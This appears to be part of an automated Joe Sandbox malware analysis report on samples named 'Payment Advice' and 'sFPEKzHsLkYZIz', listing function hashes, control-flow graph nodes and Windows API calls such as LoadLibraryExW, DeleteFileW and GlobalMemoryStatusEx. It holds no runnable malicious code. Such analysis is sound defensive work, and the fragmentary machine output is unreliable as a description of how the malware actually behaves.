                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-3823777903
                                                                                      • Opcode ID: f47eb711b896529e95fd09bb63033aa8e0da9df469ab3eee3e7aef93c8033d2a
                                                                                      • Instruction ID: ff8027e658eb57777abe9bc065862a8d8e83e662bae6088da1b78b52f451be02
                                                                                      • Opcode Fuzzy Hash: f47eb711b896529e95fd09bb63033aa8e0da9df469ab3eee3e7aef93c8033d2a
                                                                                      • Instruction Fuzzy Hash: 44916B30E402099FDB68EF64D955BAEBBF2BF85B04F108529E401EB394DB759C45CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E70B0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-390881366
                                                                                      • Opcode ID: f8f0d57df912768498f17e84ac97bbdb7f7c6b47edae0ce00ec2237d12a6b0e6
                                                                                      • Instruction ID: a500dd5d63d3c37fdc5dd80dc5af21ba147b5f7c3df0ec67199ac62deeb5d394
                                                                                      • Opcode Fuzzy Hash: f8f0d57df912768498f17e84ac97bbdb7f7c6b47edae0ce00ec2237d12a6b0e6
                                                                                      • Instruction Fuzzy Hash: 6CF14E34B00208CFDB58EFA8D594A6EB7B2BF85304F648569D445DB3A9DB35DC86CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E83E8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      • Opcode ID: 5a35b0682316703c40462b5c0cd8eb4990174af779cc3ee27e6e7cded39db0b6
                                                                                      • Instruction ID: 25eea596b9262d6967d263d4df8b0391ca5c796e5782f4832ce9a45074acb71c
                                                                                      • Opcode Fuzzy Hash: 5a35b0682316703c40462b5c0cd8eb4990174af779cc3ee27e6e7cded39db0b6
                                                                                      • Instruction Fuzzy Hash: 5AB13E70A102088FDB54EF78D98469EB7B2FF85304F248829D509EB365DB75DC86CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068EACDB Relevance: 5.2, Strings: 4, Instructions: 177COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      • Opcode ID: 7610e6c7ee7a01dff5eacdc28b3bf6f09a9fddafe7ab82821b61ca274cc5a66c
                                                                                      • Instruction ID: d863de10c8c0b71bf8520063a9afbbe0462bf6e2670c3b3834f4600d1dc9cc2f
                                                                                      • Opcode Fuzzy Hash: 7610e6c7ee7a01dff5eacdc28b3bf6f09a9fddafe7ab82821b61ca274cc5a66c
                                                                                      • Instruction Fuzzy Hash: F151BE34B102059FCFA9EB64D8806ADB7F2EF8A711F14852AE902DB355DB34DC45CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E8800 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LR^q$LR^q$$^q$$^q
                                                                                      • API String ID: 0-2454687669
                                                                                      • Opcode ID: f306c59a60eb4c96b9c0567c4249e4321a4cf30b0f65b8410b3d6d9dc9a97313
                                                                                      • Instruction ID: 955873b92aa4ef0ad23f1e8ea8f613ab911d0ba6abd3c28645ceb791561243c8
                                                                                      • Opcode Fuzzy Hash: f306c59a60eb4c96b9c0567c4249e4321a4cf30b0f65b8410b3d6d9dc9a97313
                                                                                      • Instruction Fuzzy Hash: 5C51D070B002058FDB58EF78C941A6EB7E6BF89304F148569E506DB3A5DB31EC45CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:3.6%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:10
                                                                                      Total number of Limit Nodes:1
                                                                                      execution_graph 9959 30bdd88 9960 30bdd9c 9959->9960 9961 30bddc1 9960->9961 9963 30bcea8 9960->9963 9964 30bdf48 LoadLibraryExW 9963->9964 9966 30bdfc1 9964->9966 9966->9961 9967 30bdce0 9968 30bdd28 GetModuleHandleW 9967->9968 9969 30bdd22 9967->9969 9970 30bdd55 9968->9970 9969->9968

                                                                                      Executed Functions

                                                                                      Function 030BCEA8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 139 30bcea8-30bdf88 141 30bdf8a-30bdf8d 139->141 142 30bdf90-30bdfbf LoadLibraryExW 139->142 141->142 143 30bdfc8-30bdfe5 142->143 144 30bdfc1-30bdfc7 142->144 144->143
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030BDDC1,00000800,00000000,00000000), ref: 030BDFB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1756057889.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_30b0000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 482a12b43867bc78d1f4f3655cbf64979ef41e77365345c07dbbfede2f49e576
                                                                                      • Instruction ID: c4da6ee36609088ef051b2d0cae343bcffbaf8be284db660edf7e1aa4ea53468
                                                                                      • Opcode Fuzzy Hash: 482a12b43867bc78d1f4f3655cbf64979ef41e77365345c07dbbfede2f49e576
                                                                                      • Instruction Fuzzy Hash: 151123B6D043499FDB10CF9AC544ADEFBF4EB88314F14842AE919A7350C375A945CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 030BDCE0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 147 30bdce0-30bdd20 148 30bdd28-30bdd53 GetModuleHandleW 147->148 149 30bdd22-30bdd25 147->149 150 30bdd5c-30bdd70 148->150 151 30bdd55-30bdd5b 148->151 149->148 151->150
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 030BDD46
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1756057889.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_30b0000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: 9311f0fcd6c67dcf991092e118a776d0ef786a89d7bf559ec96804fc1dca39e9
                                                                                      • Instruction ID: da0dd1a848c9f85e22820a828daaafe96a0745051c26574a6c0e2f7392f328a0
                                                                                      • Opcode Fuzzy Hash: 9311f0fcd6c67dcf991092e118a776d0ef786a89d7bf559ec96804fc1dca39e9
                                                                                      • Instruction Fuzzy Hash: B6111DB6D00249CFCB10CF9AD444ADEFBF4AF88364F14842AD869B7210C379A545CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0170D06C Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 287 170d06c-170d07e 288 170d084 287->288 289 170d118-170d11f 287->289 290 170d086-170d092 288->290 289->290 291 170d124-170d129 290->291 292 170d098-170d0ba 290->292 291->292 294 170d0bc-170d0e0 292->294 295 170d12e-170d143 292->295 297 170d0e8-170d0f8 294->297 300 170d0fa-170d102 295->300 299 170d150 297->299 297->300 301 170d104-170d115 300->301 302 170d145-170d14e 300->302 302->301
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755448547.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_170d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ddd17d54b09c5a0a2ba0067931c67655ac3abce72db6d06ee6251455192df089
                                                                                      • Instruction ID: 91365f5aaeceb431e8fbfb47ee65d880eba04eef361fddd9afb09b663f50f00a
                                                                                      • Opcode Fuzzy Hash: ddd17d54b09c5a0a2ba0067931c67655ac3abce72db6d06ee6251455192df089
                                                                                      • Instruction Fuzzy Hash: DB21F771504340DFDB26DF94D9C4B26FFA5FB88314F24C1A9E9094A296C73AD416CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0171D2F0 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 344 171d2f0-171d302 345 171d391-171d398 344->345 346 171d308 344->346 347 171d30a-171d316 345->347 346->347 348 171d39d-171d3a2 347->348 349 171d31c-171d33e 347->349 348->349 351 171d340-171d35a 349->351 352 171d3a7-171d3bc 349->352 354 171d362-171d371 351->354 356 171d373-171d37b 352->356 354->356 357 171d3c9 354->357 358 171d37d-171d38e 356->358 359 171d3be-171d3c7 356->359 359->358
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755547807.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_171d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7fdc898d3976e617dfcece6403574b13bd6c61c8116673e4102ea475e6eda8ed
                                                                                      • Instruction ID: 46571375634fa7573414ce8338ccc7ba9ce787011a4b47371919c4231d75336e
                                                                                      • Opcode Fuzzy Hash: 7fdc898d3976e617dfcece6403574b13bd6c61c8116673e4102ea475e6eda8ed
                                                                                      • Instruction Fuzzy Hash: 6B2104B1604204DFDB25DF9CD9C8B26FBA5FB84314F20C6ADD8494B25AC33AD446CE61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0171D01C Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 327 171d01c-171d02e 328 171d034 327->328 329 171d0bd-171d0c4 327->329 330 171d036-171d042 328->330 329->330 331 171d0c9-171d0ce 330->331 332 171d048-171d06a 330->332 331->332 334 171d0d3-171d0e8 332->334 335 171d06c-171d086 332->335 339 171d09f-171d0a7 334->339 338 171d08e-171d09d 335->338 338->339 340 171d0f5 338->340 341 171d0a9-171d0ba 339->341 342 171d0ea-171d0f3 339->342 342->341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755547807.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_171d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3c8810ad0a5178bd3cd54c882ce3e52a9b85f75c2d464115028bed08559f9d71
                                                                                      • Instruction ID: 27ec7cb34343582cc1b932d1cc1a53a72d8d0b10c06b5999287ad61b7ed27c9d
                                                                                      • Opcode Fuzzy Hash: 3c8810ad0a5178bd3cd54c882ce3e52a9b85f75c2d464115028bed08559f9d71
                                                                                      • Instruction Fuzzy Hash: BA212275604200DFCB25DF5CD9C8B26FFA5EB88314F20C5ADD80A4B25AC33AD447CA61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0170D067 Relevance: .1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755448547.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_170d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                      • Instruction ID: 6bc0c3ddb636693acab44d05295f5390883eba057552045b86fb86adb3ba4b7c
                                                                                      • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                      • Instruction Fuzzy Hash: F4219D76504384DFDB16CF94D9C4B16BFB2FB88314F24C6A9E9490B256C33AD426CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0171D017 Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755547807.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_171d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction ID: ed309e2f5d871b37b5dfe32975a0fe1cc80b56fc1d989dc6d196ab19f755e727
                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction Fuzzy Hash: F611BE75504280CFDB12CF58D5C8B16FF61FB44314F24C6AAD8094B65AC33AD44ACF62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0171D2EB Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755547807.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_171d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction ID: 6a31dc3f1ca4e4b52e3a81aade37200026998f2d62719b38cf329152dbeec05c
                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction Fuzzy Hash: BC11BB75504280CFDB16CF58D5C8B15FFA2FB84314F24C6AAD8494B25AC33AD40ACF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0170D92D Relevance: .0, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755448547.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_170d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da647802a086e59154be948edba55a17963cbe4c7439879ce4728380e18294b8
                                                                                      • Instruction ID: f305a30c16c881cdd557cd2c4dc33af053d7e918b2d095dc9e7e54a9d097f91a
                                                                                      • Opcode Fuzzy Hash: da647802a086e59154be948edba55a17963cbe4c7439879ce4728380e18294b8
                                                                                      • Instruction Fuzzy Hash: 2D01A271008344DAE7228EEEC984B67FFD9EF45324F18C46AED494A2C6C2799840C6B1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0170D92C Relevance: .0, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755448547.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_170d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d73979e6985224f2a7ea5801e04ea94c05e6d02f8a0c68d5f535e86e5b582653
                                                                                      • Instruction ID: 810d7b61fd1ab9e7689d67bfd7ca4f391a32a5eb4859caba93ede7b9ddeeb516
                                                                                      • Opcode Fuzzy Hash: d73979e6985224f2a7ea5801e04ea94c05e6d02f8a0c68d5f535e86e5b582653
                                                                                      • Instruction Fuzzy Hash: 49F06271404344AAE7218A5AC9C8B66FFE9EB45624F18C45AED484A2C6C2799844CAB1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:13.7%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:27
                                                                                      Total number of Limit Nodes:5
                                                                                      execution_graph 26592 f58170 26593 f581b6 DeleteFileW 26592->26593 26595 f581ef 26593->26595 26596 f50848 26598 f5084e 26596->26598 26597 f5091b 26598->26597 26601 f514b7 26598->26601 26606 f51393 26598->26606 26602 f513a6 26601->26602 26603 f514b4 26602->26603 26605 f514b7 2 API calls 26602->26605 26612 f58348 26602->26612 26603->26598 26605->26602 26607 f51374 26606->26607 26609 f5139b 26606->26609 26607->26598 26608 f514b4 26608->26598 26609->26608 26610 f58348 2 API calls 26609->26610 26611 f514b7 2 API calls 26609->26611 26610->26609 26611->26609 26613 f58352 26612->26613 26614 f5836c 26613->26614 26617 648fa50 26613->26617 26621 648fa60 26613->26621 26614->26602 26619 648fa60 26617->26619 26618 648fc8a 26618->26614 26619->26618 26620 648fca1 GlobalMemoryStatusEx GlobalMemoryStatusEx 26619->26620 26620->26619 26623 648fa62 26621->26623 26622 648fc8a 26622->26614 26623->26622 26624 648fca1 GlobalMemoryStatusEx GlobalMemoryStatusEx 26623->26624 26624->26623

                                                                                      Executed Functions

                                                                                      Function 06483478 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 126 6483478-6483499 127 648349b-648349e 126->127 128 6483c3f-6483c42 127->128 129 64834a4-64834c3 127->129 130 6483c68-6483c6a 128->130 131 6483c44-6483c63 128->131 138 64834dc-64834e6 129->138 139 64834c5-64834c8 129->139 132 6483c6c 130->132 133 6483c71-6483c74 130->133 131->130 132->133 133->127 136 6483c7a-6483c83 133->136 144 64834ec-64834fb 138->144 139->138 141 64834ca-64834da 139->141 141->144 252 64834fd call 6483c98 144->252 253 64834fd call 6483c90 144->253 145 6483502-6483507 146 6483509-648350f 145->146 147 6483514-64837f1 145->147 146->136 168 6483c31-6483c3e 147->168 169 64837f7-64838a6 147->169 178 64838a8-64838cd 169->178 179 64838cf 169->179 181 64838d8-64838eb 178->181 179->181 183 6483c18-6483c24 181->183 184 64838f1-6483913 181->184 183->169 185 6483c2a 183->185 184->183 187 6483919-6483923 184->187 185->168 187->183 188 6483929-6483934 187->188 188->183 189 648393a-6483a10 188->189 201 6483a1e-6483a4e 189->201 202 6483a12-6483a14 189->202 206 6483a5c-6483a68 201->206 207 6483a50-6483a52 201->207 202->201 208 6483ac8-6483acc 206->208 209 6483a6a-6483a6e 206->209 207->206 210 6483c09-6483c12 208->210 211 6483ad2-6483b0e 208->211 209->208 212 6483a70-6483a9a 209->212 210->183 210->189 223 6483b1c-6483b2a 211->223 224 6483b10-6483b12 211->224 219 6483aa8-6483ac5 212->219 220 6483a9c-6483a9e 212->220 219->208 220->219 226 6483b2c-6483b37 223->226 227 6483b41-6483b4c 223->227 224->223 226->227 230 6483b39 226->230 231 6483b4e-6483b54 227->231 232 6483b64-6483b75 227->232 230->227 233 6483b58-6483b5a 231->233 234 6483b56 231->234 236 6483b8d-6483b99 232->236 237 6483b77-6483b7d 232->237 233->232 234->232 241 6483b9b-6483ba1 236->241 242 6483bb1-6483c02 236->242 238 6483b7f 237->238 239 6483b81-6483b83 237->239 238->236 239->236 243 6483ba3 241->243 244 6483ba5-6483ba7 241->244 242->210 243->242 244->242 252->145 253->145
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2392861976
                                                                                      • Opcode ID: 458a4637299490107713f2075b2d26b3915106c62064a85f001b45b102c68c12
                                                                                      • Instruction ID: 3a175fd08038d7a24dda9d341bf4720cb440e4178a0a54b96feb213761722842
                                                                                      • Opcode Fuzzy Hash: 458a4637299490107713f2075b2d26b3915106c62064a85f001b45b102c68c12
                                                                                      • Instruction Fuzzy Hash: DF322131E1071A8FCB15EFB5C85499DB7B6FFC9700F14C6AAD409AB215EB309985CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06487D88 Relevance: 3.0, Strings: 2, Instructions: 479COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 795 6487d88-6487da6 796 6487da8-6487dab 795->796 797 6487dad-6487dc9 796->797 798 6487dce-6487dd1 796->798 797->798 800 6487dde-6487de1 798->800 801 6487dd2-6487ddd 798->801 803 6487df8-6487dfb 800->803 804 6487de3-6487df1 800->804 805 6487e1c-6487e1e 803->805 806 6487dfd-6487e17 803->806 812 6487e2e-6487e44 804->812 813 6487df3 804->813 808 6487e20 805->808 809 6487e25-6487e28 805->809 806->805 808->809 809->796 809->812 816 6487e4a-6487e53 812->816 817 648805f-6488069 812->817 813->803 818 6487e59-6487e76 816->818 819 648806a-648809f 816->819 826 648804c-6488059 818->826 827 6487e7c-6487ea4 818->827 822 64880a1-64880a4 819->822 824 64880aa-64880b9 822->824 825 64882d0-64882d3 822->825 836 64880d8-6488113 824->836 837 64880bb-64880d6 824->837 828 64882d9-64882e5 825->828 829 648838a-648838d 825->829 826->816 826->817 827->826 850 6487eaa-6487eb3 827->850 838 64882f0-64882f2 828->838 831 648838f-64883ab 829->831 832 64883b0-64883b2 829->832 831->832 833 64883b9-64883bc 832->833 834 64883b4 832->834 833->822 839 64883c2-64883cb 833->839 834->833 852 6488119-648812a 836->852 853 64882a4-64882ba 836->853 837->836 840 648830a-6488311 838->840 841 64882f4-64882fa 838->841 847 6488322 840->847 848 6488313-6488320 840->848 845 64882fc 841->845 846 64882fe-6488300 841->846 845->840 846->840 851 6488327-6488329 847->851 848->851 850->819 856 6487eb9-6487ed5 850->856 858 648832b-648832e 851->858 859 6488340-6488379 851->859 861 648828f-648829e 852->861 862 6488130-648814d 852->862 853->825 866 648803a-6488046 856->866 867 6487edb-6487f05 856->867 858->839 859->824 879 648837f-6488389 859->879 861->852 861->853 862->861 874 6488153-6488249 call 64865b0 862->874 866->826 866->850 880 6487f0b-6487f33 867->880 881 6488030-6488035 867->881 929 648824b-6488255 874->929 930 6488257 874->930 880->881 887 6487f39-6487f67 880->887 881->866 887->881 893 6487f6d-6487f76 887->893 893->881 895 6487f7c-6487fae 893->895 902 6487fb9-6487fd5 895->902 903 6487fb0-6487fb4 895->903 902->866 905 6487fd7-648802e call 64865b0 902->905 903->881 904 6487fb6 903->904 904->902 905->866 931 648825c-648825e 929->931 930->931 931->861 932 6488260-6488265 931->932 933 6488273 932->933 934 6488267-6488271 932->934 935 6488278-648827a 933->935 934->935 935->861 936 648827c-6488288 935->936 936->861
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q
                                                                                      • API String ID: 0-355816377
                                                                                      • Opcode ID: 757653f3ce36c27aed3b285acb4fa10591412c1dbb1f2ce162d6cf999818c9b3
                                                                                      • Instruction ID: 898c4a93e42d2b17cca0985acdd25d32d2fc82c445e71733eeaf701cffed2a3a
                                                                                      • Opcode Fuzzy Hash: 757653f3ce36c27aed3b285acb4fa10591412c1dbb1f2ce162d6cf999818c9b3
                                                                                      • Instruction Fuzzy Hash: 7E02DF30B002058FDB55EF68D990AAEB7E2FF85304F64856AE405DB395DB35EC86CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 064855B8 Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1919 64855b8-64855d5 1920 64855d7-64855da 1919->1920 1921 64855e9-64855ec 1920->1921 1922 64855dc-64855e2 1920->1922 1923 64855ee-64855f1 1921->1923 1925 64855f6-64855f9 1921->1925 1922->1923 1924 64855e4 1922->1924 1923->1925 1924->1921 1926 64855fb-64855fe 1925->1926 1927 6485603-6485606 1925->1927 1926->1927 1928 6485608-6485612 1927->1928 1929 6485620-6485623 1927->1929 1936 6485619-648561b 1928->1936 1930 6485634-6485637 1929->1930 1931 6485625-6485629 1929->1931 1934 6485639-6485648 1930->1934 1935 648564d-6485650 1930->1935 1932 648562f 1931->1932 1933 6485785-6485792 1931->1933 1932->1930 1934->1935 1937 6485658-648565b 1935->1937 1938 6485652-6485653 1935->1938 1936->1929 1940 6485678-648567b 1937->1940 1941 648565d-6485673 1937->1941 1938->1937 1942 648568c-6485692 1940->1942 1943 648567d-6485680 1940->1943 1941->1940 1942->1928 1944 6485698 1942->1944 1946 6485682-6485684 1943->1946 1947 6485687-648568a 1943->1947 1948 648569d-64856a0 1944->1948 1946->1947 1947->1942 1947->1948 1949 648573a-6485740 1948->1949 1950 64856a6-64856a9 1948->1950 1951 64856ab-64856b1 1949->1951 1952 6485746 1949->1952 1950->1951 1953 64856e1-64856e4 1950->1953 1955 6485793-64857c3 1951->1955 1956 64856b7-64856bf 1951->1956 1954 648574b-648574e 1952->1954 1957 64856f0-64856f3 1953->1957 1958 64856e6-64856ef 1953->1958 1959 648575c-648575f 1954->1959 1960 6485750-6485757 1954->1960 1976 64857cd-64857d0 1955->1976 1956->1955 1961 64856c5-64856d2 1956->1961 1962 6485719-648571c 1957->1962 1963 64856f5-6485714 1957->1963 1964 6485761-648576e 1959->1964 1965 6485773-6485775 1959->1965 1960->1959 1961->1955 1966 64856d8-64856dc 1961->1966 1967 648571e-6485730 1962->1967 1968 6485735-6485738 1962->1968 1963->1962 